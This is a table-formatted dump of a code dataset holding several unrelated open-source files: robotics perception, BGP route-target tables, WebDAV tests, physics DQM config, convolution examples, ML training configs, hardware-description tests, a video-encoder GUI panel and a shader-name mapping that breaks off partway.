max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
examples_and_tutorials/grid/heuristic_perception.py | ali-senguel/fairo | 669 | 12685874 | from droidlet.memory.memory_nodes import PlayerNode
class HeuristicPerception:
def __init__(self, agent):
self.agent = agent
def perceive(self):
bots = self.agent.world.get_bots()
for bot in bots:
# print(f"[Perception INFO]: Perceived bot [{bot.name}] in the world, update in memory]")
bot_node = self.agent.memory.get_player_by_eid(bot.entityId)
if bot_node is None:
memid = PlayerNode.create(self.agent.memory, bot)
bot_node = PlayerNode(self.agent.memory, memid)
self.agent.memory.tag(memid, "bot")
bot_node.update(self.agent.memory, bot, bot_node.memid)
print(
f"[Memory INFO]: update bot [{bot.name}] position: ({bot.pos.x}, {bot.pos.y}, {bot.pos.z})"
)
bot_memids = self.agent.memory.get_memids_by_tag("bot")
bots_in_world = [b.entityId for b in bots]
for memid in bot_memids:
bot_eid = self.agent.memory.get_mem_by_id(memid).eid
if bot_eid not in bots_in_world:
self.agent.memory.forget(memid)
print(f"[Memory INFO]: delete bot [{bot_eid}] from memory")
|
ryu/services/protocols/bgp/info_base/rtc.py | w180112/ryu | 975 | 12685879 | # Copyright (C) 2014 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Defines data types and models required specifically for RTC support.
"""
import logging
from ryu.lib.packet.bgp import RF_RTC_UC
from ryu.services.protocols.bgp.info_base.base import Destination
from ryu.services.protocols.bgp.info_base.base import NonVrfPathProcessingMixin
from ryu.services.protocols.bgp.info_base.base import Path
from ryu.services.protocols.bgp.info_base.base import Table
LOG = logging.getLogger('bgpspeaker.info_base.rtc')
class RtcTable(Table):
"""Global table to store RT membership information.
Uses `RtDest` to store destination information for each known RT NLRI path.
"""
ROUTE_FAMILY = RF_RTC_UC
def __init__(self, core_service, signal_bus):
Table.__init__(self, None, core_service, signal_bus)
def _table_key(self, rtc_nlri):
"""Return a key that will uniquely identify this RT NLRI inside
this table.
"""
return str(rtc_nlri.origin_as) + ':' + rtc_nlri.route_target
def _create_dest(self, nlri):
return RtcDest(self, nlri)
def __str__(self):
return 'RtcTable(scope_id: %s, rf: %s)' % (self.scope_id,
self.route_family)
class RtcDest(Destination, NonVrfPathProcessingMixin):
ROUTE_FAMILY = RF_RTC_UC
def _new_best_path(self, new_best_path):
NonVrfPathProcessingMixin._new_best_path(self, new_best_path)
def _best_path_lost(self):
NonVrfPathProcessingMixin._best_path_lost(self)
class RtcPath(Path):
ROUTE_FAMILY = RF_RTC_UC
def __init__(self, source, nlri, src_ver_num, pattrs=None,
nexthop='0.0.0.0', is_withdraw=False,
med_set_by_target_neighbor=False):
Path.__init__(self, source, nlri, src_ver_num, pattrs, nexthop,
is_withdraw, med_set_by_target_neighbor)
|
txweb2/dav/test/test_options.py | backwardn/ccs-calendarserver | 462 | 12685886 | ##
# Copyright (c) 2005-2017 Apple Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# DRI: <NAME>, <EMAIL>
##
from txweb2.iweb import IResponse
import txweb2.dav.test.util
from txweb2.test.test_server import SimpleRequest
class OPTIONS(txweb2.dav.test.util.TestCase):
"""
OPTIONS request
"""
def test_DAV1(self):
"""
DAV level 1
"""
return self._test_level("1")
def test_DAV2(self):
"""
DAV level 2
"""
return self._test_level("2")
test_DAV2.todo = "DAV level 2 unimplemented"
def test_ACL(self):
"""
DAV ACL
"""
return self._test_level("access-control")
def _test_level(self, level):
def doTest(response):
response = IResponse(response)
dav = response.headers.getHeader("dav")
if not dav:
self.fail("no DAV header: %s" % (response.headers,))
self.assertIn(level, dav, "no DAV level %s header" % (level,))
return response
return self.send(SimpleRequest(self.site, "OPTIONS", "/"), doTest)
|
DQMOffline/CalibCalo/python/MonitorAlCaEcalPhisym_cfi.py | ckamtsikis/cmssw | 852 | 12685890 | # The following comments couldn't be translated into the new config version:
# prescale
import FWCore.ParameterSet.Config as cms
#
#
# \author <NAME>
#
EcalPhiSymMonDQM = cms.EDAnalyzer("HLTAlCaMonEcalPhiSym",
# product to monitor
AlCaStreamEBTag = cms.untracked.InputTag("hltAlCaPhiSymStream","phiSymEcalRecHitsEB"),
SaveToFile = cms.untracked.bool(False),
FileName = cms.untracked.string('MonitorAlCaEcalPhiSym.root'),
AlCaStreamEETag = cms.untracked.InputTag("hltAlCaPhiSymStream","phiSymEcalRecHitsEE"),
prescaleFactor = cms.untracked.int32(1),
# DQM folder to write to
FolderName = cms.untracked.string('AlCaReco/EcalPhiSym')
)
|
usr/callbacks/next/next.py | uwitec/LEHome | 151 | 12685915 | <gh_stars>100-1000
#!/usr/bin/env python
# encoding: utf-8
from lib.model import Callback
class next_callback(Callback.Callback):
def callback(self, action = None, target = None,
msg = None, state = None,
pre_value = None, pass_value = None):
DEBUG("* next callback: action: %s, target: %s, message: %s state: %s pre_value: %s pass_value %s" %(action, target, msg, state, pre_value, pass_value))
return True, "pass"
|
contents/convolutions/2d/code/python/2d_convolution.py | alzawad26/algorithm-archive | 1,975 | 12685963 | <reponame>alzawad26/algorithm-archive
import numpy as np
from contextlib import suppress
def convolve_linear(signal, filter, output_size):
out = np.zeros(output_size)
sum = 0
for i in range(output_size[0]):
for j in range(output_size[1]):
for k in range(max(0, i-filter.shape[0]), i+1):
for l in range(max(0, j-filter.shape[1]), j+1):
with suppress(IndexError):
sum += signal[k, l] * filter[i-k, j-l]
out[i, j] = sum
sum = 0
return out
def create_gaussian_kernel(kernel_size):
kernel = np.zeros((kernel_size, kernel_size))
# The center must be offset by 0.5 to find the correct index
center = kernel_size*0.5 + 0.5
sigma = np.sqrt(0.1*kernel_size)
def kernel_function(x, y):
return np.exp(-((x-center+1)**2 + (y-center+1)**2)/(2*sigma**2))
kernel = np.fromfunction(kernel_function, (kernel_size, kernel_size))
return kernel / np.linalg.norm(kernel)
def create_sobel_operators():
Sx = np.dot([[1.0], [2.0], [1.0]], [[-1.0, 0.0, 1.0]]) / 9
Sy = np.dot([[-1.0], [0.0], [1.0]], [[1.0, 2.0, 1.0]]) / 9
return Sx, Sy
def sum_matrix_dimensions(mat1, mat2):
return (mat1.shape[0] + mat2.shape[0],
mat1.shape[1] + mat2.shape[1])
def compute_sobel(signal):
Sx, Sy = create_sobel_operators()
Gx = convolve_linear(signal, Sx, sum_matrix_dimensions(signal, Sx))
Gy = convolve_linear(signal, Sy, sum_matrix_dimensions(signal, Sy))
return np.sqrt(np.power(Gx, 2) + np.power(Gy, 2))
def create_circle(image_resolution, grid_extents, radius):
out = np.zeros((image_resolution, image_resolution))
for i in range(image_resolution):
x_position = ((i * grid_extents / image_resolution)
- 0.5 * grid_extents)
for j in range(image_resolution):
y_position = ((j * grid_extents / image_resolution)
- 0.5 * grid_extents)
if x_position ** 2 + y_position ** 2 <= radius ** 2:
out[i, j] = 1.0
return out
def main():
# Random distribution in x
x = np.random.rand(100, 100)
# Gaussian signals
def create_gaussian_signals(i, j):
return np.exp(-(((i-50)/100) ** 2 +
((j-50)/100) ** 2) / .01)
y = np.fromfunction(create_gaussian_signals, (100, 100))
# Normalization is not strictly necessary, but good practice
x /= np.linalg.norm(x)
y /= np.linalg.norm(y)
# full convolution, output will be the size of x + y
full_linear_output = convolve_linear(x, y, sum_matrix_dimensions(x, y))
# simple boundaries
simple_linear_output = convolve_linear(x, y, x.shape)
np.savetxt("full_linear.dat", full_linear_output)
np.savetxt("simple_linear.dat", simple_linear_output)
# creating simple circle and 2 different Gaussian kernels
circle = create_circle(50, 2, 0.5)
circle = circle / np.linalg.norm(circle)
small_kernel = create_gaussian_kernel(3)
large_kernel = create_gaussian_kernel(25)
small_kernel_output = convolve_linear(circle, small_kernel,
sum_matrix_dimensions(circle,
small_kernel))
large_kernel_output = convolve_linear(circle, large_kernel,
sum_matrix_dimensions(circle,
large_kernel))
np.savetxt("small_kernel.dat", small_kernel_output)
np.savetxt("large_kernel.dat", large_kernel_output)
circle = create_circle(50, 2, 0.5)
# Normalization
circle = circle / np.linalg.norm(circle)
# using the circle for sobel operations as well
sobel_output = compute_sobel(circle)
np.savetxt("sobel_output.dat", sobel_output)
|
configs/seg/_base_/schedules/schedule_adamw_80k.py | yinchimaoliang/K-Net | 361 | 12685979 | # optimizer
optimizer = dict(type='AdamW', lr=0.0001, weight_decay=0.0005)
optimizer_config = dict(grad_clip=dict(max_norm=1, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=1000,
warmup_ratio=0.001,
step=[60000, 72000],
by_epoch=False)
# runtime settings
runner = dict(type='IterBasedRunner', max_iters=80000)
checkpoint_config = dict(by_epoch=False, interval=8000)
evaluation = dict(interval=8000, metric='mIoU')
|
examples/YOLOv3_Training.py | KerasKorea/YOLK_ObjectDetector | 124 | 12685990 | from keras.optimizers import Adam
from keras_yolov3.train import get_anchors, get_classes, data_generator_wrapper
from keras_yolov3.yolov3_class import YOLOv3
import tensorflow as tf
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
classes_path = '../keras_yolov3/model_data/coco_classes.txt'
anchors_path = '../keras_yolov3/model_data/yolo_anchors.txt'
class_names = get_classes(classes_path)
num_classes = len(class_names)
anchors = get_anchors(anchors_path)
num_anchors = len(anchors)
yolov3 = YOLOv3(anchors, num_classes)
model_path = '../keras_yolov3/model_data/yolo_weights.h5'
yolov3.model.load_weights(model_path, by_name=True, skip_mismatch=True)
annotation_path = '../keras_yolov3/model_data/train.txt'
with open(annotation_path) as f:
lines = f.readlines()
num_train = len(lines)
batch_size = 32
yolov3.model.compile(optimizer=Adam(lr=1e-3), loss={'yolo_loss': lambda y_true, y_pred: y_pred})
yolov3.model.fit_generator(data_generator_wrapper(lines, batch_size, yolov3.input_shape, anchors, num_classes),
steps_per_epoch=max(1, num_train // batch_size),
epochs=50,
initial_epoch=0)
|
tests/test_smart/test_smart_bits.py | leonardt/magma | 167 | 12686036 | <reponame>leonardt/magma
from functools import wraps, partial
import operator
import pytest
import magma as m
from magma.smart import SmartBit, SmartBits, concat, signed, make_smart
from magma.testing import check_files_equal
def _run_test(func=None, *, skip_check=False):
if func is None:
return partial(_run_test, skip_check=skip_check)
@wraps(func)
def _wrapper(*args, **kwargs):
name = func.__name__
ckt = func(*args, **kwargs)
m.compile(f"build/{name}", ckt, output="coreir-verilog", inline=True)
build = f"build/{name}.v"
gold = f"gold/{name}.v"
if not skip_check:
assert check_files_equal(__file__, build, gold)
return _wrapper
@_run_test
def test_binop():
# Ops can be add, sub, mul, div, mod, and, or, xor.
op = operator.add
class _Test(m.Circuit):
io = m.IO(
I0=m.In(SmartBits[8]),
I1=m.In(SmartBits[12]),
O1=m.Out(SmartBits[8]),
O2=m.Out(SmartBits[12]),
O3=m.Out(SmartBits[16]))
val = op(io.I0, io.I1)
io.O1 @= val
io.O2 @= val
io.O3 @= val
return _Test
@_run_test
def test_comparison():
# Ops can be eq, ne, ge, gt, le, lt.
op = operator.eq
class _Test(m.Circuit):
io = m.IO(
I0=m.In(SmartBits[8]),
I1=m.In(SmartBits[12]),
O1=m.Out(SmartBits[1]),
O2=m.Out(SmartBits[16]))
val = op(io.I0, io.I1)
io.O1 @= val
io.O2 @= val
return _Test
@_run_test
def test_lshift():
class _Test(m.Circuit):
io = m.IO(
I0=m.In(SmartBits[8]),
I1=m.In(SmartBits[4]),
O1=m.Out(SmartBits[8]),
O2=m.Out(SmartBits[16]))
val = io.I0 << io.I1
io.O1 @= val
io.O2 @= val
return _Test
@_run_test
def test_rshift():
class _Test(m.Circuit):
io = m.IO(
I0=m.In(SmartBits[8]),
I1=m.In(SmartBits[4]),
O1=m.Out(SmartBits[4]),
O2=m.Out(SmartBits[8]),
O3=m.Out(SmartBits[16]))
val = io.I0 >> io.I1
io.O1 @= val
io.O2 @= val
io.O3 @= val
return _Test
@_run_test
def test_concat():
class _Test(m.Circuit):
io = m.IO(
I0=m.In(SmartBits[8]),
I1=m.In(SmartBits[4]),
I2=m.In(SmartBits[10]),
O1=m.Out(SmartBits[4]),
O2=m.Out(SmartBits[16]))
val = concat(io.I0 + io.I1, io.I2)
io.O1 @= val
io.O2 @= val
return _Test
@_run_test
def test_unary():
# Ops can be invert, neg.
op = operator.invert
class _Test(m.Circuit):
io = m.IO(
I0=m.In(SmartBits[8]),
O1=m.Out(SmartBits[4]),
O2=m.Out(SmartBits[16]))
val = op(io.I0)
io.O1 @= val
io.O2 @= val
return _Test
@_run_test
def test_reduction():
# Ops can be and, or, xor.
op = operator.and_
class _Test(m.Circuit):
io = m.IO(
I0=m.In(SmartBits[8]),
O1=m.Out(SmartBits[1]),
O2=m.Out(SmartBits[16]))
val = io.I0.reduce(op)
io.O1 @= val
io.O2 @= val
return _Test
@_run_test
def test_smoke():
# NOTE(rsetaluri): We use a CircuitBuilder here just so we can dynamically
# add ports to make the test specification easier. The test just creates a
# bunch of SmartBits values and does operations and wires them. This is
# easiest to do and check in the context of a circuit definition. It is also
# (mostly) possible to do them on anonymous values but is less convenient.
class _Test(m.CircuitBuilder):
def __init__(self, name):
super().__init__(name)
self._counter = 0
def fresh_name(self):
name = f"port{self._counter}"
self._counter += 1
return name
def make_ports(self, *widths):
assert len(widths) >= 2
names = []
for i, width in enumerate(widths):
name = self.fresh_name()
width = widths[i]
T = SmartBit if width is None else SmartBits[width]
dir_ = m.Out if i == 0 else m.In
self._add_port(name, dir_(T))
names.append(name)
return [self._port(name) for name in names]
@m.builder_method
def _finalize(self):
# Any Smart<x> can be wired to any Smart<y>.
x, y = self.make_ports(10, 16)
x @= y # truncate y
y, x = self.make_ports(16, 10)
y @= x # extend x
x, z = self.make_ports(10, None)
x @= z # extend z
z, x = self.make_ports(None, 10)
z @= x # truncate x
# Any Smart<x> (op) Smart<y> is valid; each (op) has its own width
# rules.
# Arithmetic and logic.
out, x, y = self.make_ports(12, 10, 16)
out @= x + y # width = max(12, 10, 16); op: +, -, *, /, %, &, |, ^
out, x, z = self.make_ports(None, 10, None)
out @= x + z # width = max(1, 10, 1)
out, x = self.make_ports(16, 10)
out @= ~x # width = max(16, 10); ~
# Comparison.
out, x, y = self.make_ports(12, 10, 16)
out @= x <= y # width = 1; op: ==, !=, <, <=, >, >=
# Reductiton.
out, x = self.make_ports(4, 10)
out @= x.reduce(operator.and_) # width = 1; op: &, |, ^
# Shifting.
out, x, y = self.make_ports(10, 10, 16)
out @= x << y # extend x, truncate output; width = 10; op: <<, >>
out, x, y = self.make_ports(16, 10, 16)
out @= y << x # extend x; width = 16
out, x, z = self.make_ports(10, 10, None)
out @= x << z # extend z; width = 10
out, x, z = self.make_ports(None, 10, None)
out @= z << x # extend z, truncate output; width = 1
# Concat.
out, x, y, z = self.make_ports(32, 10, 16, None)
out @= concat(x, y, z) # extend concat; width = 10 + 16 + 1 = 27.
class _TestTop(m.Circuit):
inst = _Test(name="Test")
return type(_TestTop.instances[0])
@_run_test
def test_complex():
class _Test(m.Circuit):
io = m.IO(
I0=m.In(SmartBits[7]),
I1=m.In(SmartBits[9, True]),
I2=m.In(SmartBits[12, True]),
O=m.Out(SmartBits[10]),
O2=m.Out(SmartBits[7]),
O3=m.Out(SmartBit),
)
x = (~(io.I0 + io.I1) + io.I2) << io.I0.reduce(operator.and_)
y = signed(io.I1 <= io.I2) + signed(io.I0)
io.O @= x
io.O2 @= y
io.O3 @= io.I0
EXPECTED = ("lshift(add(invert(add(Extend[width=5, "
"signed=False](SmartBits[7, False](I0)), Extend[width=3, "
"signed=False](SmartBits[9, True](I1)))), SmartBits[12, "
"True](I2)), Extend[width=11, "
"signed=False](AndReduce(SmartBits[7, False](I0))))")
assert str(_Test.io.O._smart_expr_) == EXPECTED
return _Test
def test_type_constructors():
T1 = SmartBits[8]
assert T1._T is m.Bits[8]
assert T1._signed == False
T2 = SmartBits[12, True]
assert T2._T is m.Bits[12]
assert T2._signed == True
with pytest.raises(TypeError) as pytest_e:
T3 = SmartBits[8][12]
assert False
args = pytest_e.value.args
assert args == ("Can not doubly qualify SmartBits, i.e. "
"SmartBits[n][m] not allowed",)
@_run_test(skip_check=True)
def test_unsigned_add():
class _Test(m.Circuit):
io = m.IO(
x=m.In(SmartBits[8, True]),
y=m.In(SmartBits[16, False]),
O=m.Out(SmartBits[20, True])
)
io.O @= io.x + io.y
return _Test
def test_make_smart():
class _T(m.Product):
x = m.Bits[8]
y = m.Array[10, m.Bits[16]]
# Value should be non-anonymous so that the value checks below work.
value = _T(name="value")
smart = make_smart(value)
# Type checks.
assert isinstance(smart, m.Tuple)
assert set(type(smart).field_dict.keys()) == {"x", "y"}
assert isinstance(smart.x, SmartBits)
assert len(smart.x) == 8 and type(smart.x)._signed == False
assert isinstance(smart.y, m.Array)
assert isinstance(smart.y[0], SmartBits)
assert len(smart.y[0]) == 16
assert type(smart.y[0])._signed == False
# Value checks.
assert smart.x._get_magma_value_().value() is value.x
for i in range(10):
assert smart.y[i]._get_magma_value_().value() is value.y[i]
|
fastflix/widgets/panels/status_panel.py | ObviousInRetrospect/FastFlix | 388 | 12686076 | <reponame>ObviousInRetrospect/FastFlix
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import logging
import time
from datetime import timedelta
from typing import Optional
from PySide6 import QtCore, QtWidgets
from fastflix.exceptions import FlixError
from fastflix.language import t
from fastflix.models.fastflix_app import FastFlixApp
from fastflix.models.video import Video
from fastflix.shared import time_to_number, timedelta_to_str
logger = logging.getLogger("fastflix")
class StatusPanel(QtWidgets.QWidget):
speed = QtCore.Signal(str)
bitrate = QtCore.Signal(str)
nvencc_signal = QtCore.Signal(str)
tick_signal = QtCore.Signal()
def __init__(self, parent, app: FastFlixApp):
super().__init__(parent)
self.app = app
self.main = parent.main
self.current_video: Optional[Video] = None
self.started_at = None
self.ticker_thread = ElapsedTimeTicker(self, self.tick_signal)
self.ticker_thread.start()
layout = QtWidgets.QGridLayout()
self.hide_nal = QtWidgets.QCheckBox(t("Hide NAL unit messages"))
self.hide_nal.setChecked(True)
self.eta_label = QtWidgets.QLabel(f"{t('Time Left')}: N/A")
self.eta_label.setToolTip(t("Estimated time left for current command"))
self.eta_label.setStyleSheet("QLabel{margin-right:50px}")
self.time_elapsed_label = QtWidgets.QLabel(f"{t('Time Elapsed')}: N/A")
self.time_elapsed_label.setStyleSheet("QLabel{margin-right:50px}")
self.size_label = QtWidgets.QLabel(f"{t('Size Estimate')}: N/A")
self.size_label.setToolTip(t("Estimated file size based on bitrate"))
h_box = QtWidgets.QHBoxLayout()
h_box.addWidget(QtWidgets.QLabel(t("Encoder Output")), alignment=QtCore.Qt.AlignLeft)
h_box.addStretch(1)
h_box.addWidget(self.eta_label)
h_box.addWidget(self.time_elapsed_label)
h_box.addWidget(self.size_label)
h_box.addStretch(1)
h_box.addWidget(self.hide_nal, alignment=QtCore.Qt.AlignRight)
layout.addLayout(h_box, 0, 0)
self.inner_widget = Logs(self, self.app, self.main, self.app.fastflix.log_queue)
layout.addWidget(self.inner_widget, 1, 0)
self.setLayout(layout)
self.speed.connect(self.update_speed)
self.bitrate.connect(self.update_bitrate)
self.nvencc_signal.connect(self.update_nvencc)
self.main.status_update_signal.connect(self.on_status_update)
self.tick_signal.connect(self.update_time_elapsed)
def cleanup(self):
self.inner_widget.log_updater.terminate()
self.ticker_thread.stop_signal.emit()
self.ticker_thread.terminate()
def get_movie_length(self):
if not self.current_video:
return 0
return (
self.current_video.video_settings.end_time or self.current_video.duration
) - self.current_video.video_settings.start_time
def update_speed(self, combined):
if not combined:
self.eta_label.setText(f"{t('Time Left')}: N/A")
return
try:
time_passed, speed = combined.split("|")
if speed == "N/A":
self.eta_label.setText(f"{t('Time Left')}: N/A")
return
time_passed = time_to_number(time_passed)
speed = float(speed)
if not speed:
return
assert speed > 0.0001, speed
length = self.get_movie_length()
if not length:
return
data = timedelta(seconds=(length - time_passed) // speed)
except Exception:
logger.exception("can't update size ETA")
self.eta_label.setText(f"{t('Time Left')}: N/A")
else:
if not speed:
self.eta_label.setText(f"{t('Time Left')}: N/A")
self.eta_label.setText(f"{t('Time Left')}: {timedelta_to_str(data)}")
def update_bitrate(self, bitrate):
if not bitrate or bitrate.strip() == "N/A":
self.size_label.setText(f"{t('Size Estimate')}: N/A")
return
try:
bitrate, _ = bitrate.split("k", 1)
bitrate = float(bitrate)
size_eta = (self.get_movie_length() * bitrate) / 8000
except AttributeError:
self.size_label.setText(f"{t('Size Estimate')}: N/A")
except Exception:
logger.exception(f"can't update bitrate: {bitrate} - length {self.get_movie_length()}")
self.size_label.setText(f"{t('Size Estimate')}: N/A")
else:
if not size_eta:
self.size_label.setText(f"{t('Size Estimate')}: N/A")
self.size_label.setText(f"{t('Size Estimate')}: {size_eta:.2f}MB")
def update_nvencc(self, raw_line):
"""
Example line:
[53.1%] 19/35 frames: 150.57 fps, 5010 kb/s, remain 0:01:55, GPU 10%, VE 96%, VD 42%, est out size 920.6MB
"""
for section in raw_line.split(","):
section = section.strip()
if section.startswith("remain"):
self.eta_label.setText(f"{t('Time Left')}: {section.rsplit(maxsplit=1)[1]}")
elif section.startswith("est out size"):
self.size_label.setText(f"{t('Size Estimate')}: {section.rsplit(maxsplit=1)[1]}")
def update_time_elapsed(self):
now = datetime.datetime.now(datetime.timezone.utc)
if not self.started_at:
logger.warning("Unable to update time elapsed because start time isn't set")
return
try:
time_elapsed = now - self.started_at
except Exception:
logger.exception("Unable to calculate elapsed time")
return
self.time_elapsed_label.setText(f"{t('Time Elapsed')}: {timedelta_to_str(time_elapsed)}")
def on_status_update(self):
# If there was a status change, we need to restart ticker no matter what
self.started_at = datetime.datetime.now(datetime.timezone.utc)
def close(self):
self.ticker_thread.terminate()
super().close()
class Logs(QtWidgets.QTextBrowser):
log_signal = QtCore.Signal(str)
clear_window = QtCore.Signal(str)
timer_signal = QtCore.Signal(str)
def __init__(self, parent, app: FastFlixApp, main, log_queue):
super(Logs, self).__init__(parent)
self.parent = parent
self.app = app
self.main = main
self.status_panel = parent
self.current_video = None
self.log_signal.connect(self.update_text)
self.clear_window.connect(self.blank)
self.timer_signal.connect(self.timer_update)
self.log_updater = LogUpdater(self, log_queue)
self.log_updater.start()
def update_text(self, msg):
if self.status_panel.hide_nal.isChecked() and msg.endswith(("NAL unit 62", "NAL unit 63")):
return
if self.status_panel.hide_nal.isChecked() and msg.lstrip().startswith("Last message repeated"):
return
if msg.startswith("frame="):
try:
output = []
for i in (x.strip().split() for x in msg.split("=")):
output.extend(i)
frame = dict(zip(output[0::2], output[1::2]))
self.status_panel.speed.emit(f"{frame.get('time', '')}|{frame.get('speed', '').rstrip('x')}")
self.status_panel.bitrate.emit(frame.get("bitrate", ""))
except Exception:
pass
elif "remain" in msg:
self.status_panel.nvencc_signal.emit(msg)
self.append(msg)
def blank(self, data):
_, video_uuid, command_uuid = data.split(":")
try:
self.parent.current_video = self.main.find_video(video_uuid)
self.current_command = self.main.find_command(self.parent.current_video, command_uuid)
except FlixError:
logger.error(f"Couldn't find video or command for UUID {video_uuid}:{command_uuid}")
self.parent.current_video = None
self.current_command = None
self.setText("")
self.parent.started_at = datetime.datetime.now(datetime.timezone.utc)
def timer_update(self, cmd):
self.parent.ticker_thread.state_signal.emit(cmd == "START")
def closeEvent(self, event):
self.hide()
class ElapsedTimeTicker(QtCore.QThread):
state_signal = QtCore.Signal(bool)
stop_signal = QtCore.Signal() # Clean exit of program
def __init__(self, parent, tick_signal):
super().__init__(parent)
self.parent = parent
self.tick_signal = tick_signal
self.send_tick_signal = False
self.stop_received = False
self.state_signal.connect(self.set_state)
self.stop_signal.connect(self.on_stop)
def __del__(self):
self.wait()
def run(self):
while not self.stop_received:
time.sleep(0.5)
if not self.send_tick_signal:
continue
self.tick_signal.emit()
logger.debug("Ticker thread stopped")
def set_state(self, state):
self.send_tick_signal = state
def on_stop(self):
self.stop_received = True
class LogUpdater(QtCore.QThread):
def __init__(self, parent, log_queue):
super().__init__(parent)
self.parent = parent
self.log_queue = log_queue
def __del__(self):
self.wait()
def run(self):
while True:
msg = self.log_queue.get()
if msg.startswith("CLEAR_WINDOW"):
self.parent.clear_window.emit(msg)
self.parent.timer_signal.emit("START")
elif msg == "STOP_TIMER":
self.parent.timer_signal.emit("STOP")
elif msg == "UPDATE_QUEUE":
self.parent.status_panel.main.video_options.update_queue(currently_encoding=self.parent.converting)
else:
self.parent.log_signal.emit(msg)
|
startup/GafferOSL/shaderNameCompatibility.py | ddesmond/gaffer | 561 | 12686096 | <filename>startup/GafferOSL/shaderNameCompatibility.py
##########################################################################
#
# Copyright (c) 2018, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of <NAME> nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import GafferOSL
__nameMapping = {
"Utility/VectorToColor" : "Conversion/VectorToColor",
"Utility/BuildColor" : "Conversion/FloatToColor",
"Utility/SplitColor" : "Conversion/ColorToFloat",
"Utility/BuildPoint" : "Conversion/FloatToVector",
"Utility/SplitPoint" : "Conversion/VectorToFloat",
"Maths/FloatMix" : "Maths/MixFloat",
"Maths/VectorMix" : "Maths/MixVector",
"Maths/FloatAdd" : "Maths/AddFloat",
"Maths/FloatMultiply" : "Maths/MultiplyFloat",
"Maths/VectorAdd" : "Maths/AddVector",
"Maths/VectorMultiply" : "Maths/ScaleVector",
# A whole bunch of MaterialX shaders were renamed from `mx_<op>_<type>`
# to `mx_<op>_<type>_<type>` here :
#
# https://github.com/AcademySoftwareFoundation/OpenShadingLanguage/pull/909.
#
# It seems likely that this was a mistake, given that the equivalent
# shaders in the MaterialX repo are just `mx_<op>_<type>`. But to
# keep old scenes loading we have to do the conversion. If in future we
# switch to the MaterialX implementation, we will just have to
# reverse the renaming here.
"MaterialX/mx_add_color" : "MaterialX/mx_add_color_color",
"MaterialX/mx_add_color2" : "MaterialX/mx_add_color2_color2",
"MaterialX/mx_add_color4" : "MaterialX/mx_add_color4_color4",
"MaterialX/mx_add_float" : "MaterialX/mx_add_float_float",
"MaterialX/mx_add_surfaceshader" : "MaterialX/mx_add_surfaceshader_surfaceshader",
"MaterialX/mx_add_vector" : "MaterialX/mx_add_vector_vector",
"MaterialX/mx_add_vector2" : "MaterialX/mx_add_vector2_vector2",
"MaterialX/mx_add_vector4" : "MaterialX/mx_add_vector4_vector4",
"MaterialX/mx_clamp_color" : "MaterialX/mx_clamp_color_color",
"MaterialX/mx_clamp_color2" : "MaterialX/mx_clamp_color2_color2",
"MaterialX/mx_clamp_color4" : "MaterialX/mx_clamp_color4_color4",
"MaterialX/mx_clamp_float" : "MaterialX/mx_clamp_float_float",
"MaterialX/mx_clamp_vector" : "MaterialX/mx_clamp_vector_vector",
"MaterialX/mx_clamp_vector2" : "MaterialX/mx_clamp_vector2_vector2",
"MaterialX/mx_clamp_vector4" : "MaterialX/mx_clamp_vector4_vector4",
"MaterialX/mx_contrast_color" : "MaterialX/mx_contrast_color_color",
